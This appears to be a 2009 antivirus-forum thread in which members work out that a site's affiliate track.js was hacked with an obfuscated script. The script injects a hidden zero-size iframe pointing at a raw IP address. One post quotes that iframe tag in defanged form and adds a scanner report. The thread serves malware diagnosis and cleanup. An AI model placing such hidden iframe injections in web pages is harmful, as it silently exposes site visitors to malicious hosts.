system
July 20, 2009, 1:52pm
1
Hi everybody
We think avast is blacklisting our websites, as it is blocking the entire domains (if web protection is activated).
silvashop.com
avlispub.com
ultramind.ws
silvaremoteviewing.com
siga.org
choose-success.org
espsy.org
silva.supportgroup.ws
silvacourses.com
We are sure this is a false positive, our sites are probably blacklisted but we don’t know why. Can anyone help us to get rid of this trojan/false positive? Thank you very much.
system
July 20, 2009, 2:02pm
2
Maybe a member will go the possibility to check the script and html code. So we can say if its hacked or no.
Be patient another reply will can come.
Thank.
Mr.Agent
nmb
July 20, 2009, 2:08pm
3
system
July 20, 2009, 2:11pm
4
HTML:IFrame-EL Trojan, file: hXtp://silvashop.com/affiliate/scripts/track.js
Is what avast says on the few sites I checked.
nmb
July 20, 2009, 2:14pm
5
system
July 20, 2009, 2:25pm
6
Most likely this javascript has been hacked and modified.
In the js file there is an obfuscated script at the bottom which contains the malicious Iframe.
See the image below
system
July 20, 2009, 2:38pm
7
That what i was guessing. The detection of Avast! is accurate to this. ;D
system
July 20, 2009, 2:42pm
8
Thanks for your time guys!
system
July 20, 2009, 2:44pm
9
No problem ;D
Your welcome to post again if you want anything else.
Mr.Agent
Hi dominateit,
They never thought it to be benign:
http://wepawet.iseclab.org/view.php?hash=6427d31756277f7ccf230111ba10f109&t=1248116437&type=js
But it does not seem to redirect somewhere now…
the url 95.129.144.229 seems non-existent, and also seemed blacklisted by Spamhaus…
Hidden IFrame redirect…
EDITED for security reasons by me ...iframe src="hxtp://95.129.144.229/1" WIDTH="0%" HEIGHT="0%" style="hidden" MARGINHEIGHT="0"
MARGINWIDTH="0" SCROLLING="no" frameborder="0" NORESIZE^^/iframe^
(repeated 1 time)
See the Bad Stuff Detektor report:
No zeroiframes detected!
Check took 3.16 seconds
(Level: 0) Url checked:
hxtp://silvashop.com
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/track.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://edge.quantserve.com/quant.js
Zeroiframes detected on this site: 0
No ad codes identified
polonus